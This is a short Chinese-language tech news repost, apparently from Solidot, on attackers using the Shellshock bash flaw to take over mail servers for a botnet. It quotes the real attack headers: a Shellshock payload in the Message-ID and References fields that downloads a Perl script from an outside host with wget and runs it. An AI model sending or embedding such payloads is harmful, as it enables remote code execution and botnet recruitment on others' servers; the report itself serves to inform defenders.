攻擊者利用Shellshock漏洞入侵郵件服務器
攻擊者正利用上個月披露的 Shellshock 漏洞入侵郵件服務器建立僵尸網絡。Shellshock 漏洞是指攻擊者向使用 bash 的 Unix/Linux 服務器發送精心構造的請求,誘騙 bash 遠程執行命令。安全研究人員報告,攻擊者向郵件服務器發送特定的消息頭字段,誘騙服務器執行一個 Perl 腳本,成為僵尸網絡的一部分。郵件消息頭的構成是:
Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
</blockquote>
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend來自: Solidot<span id="shareA4" class="fl"> </span>本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!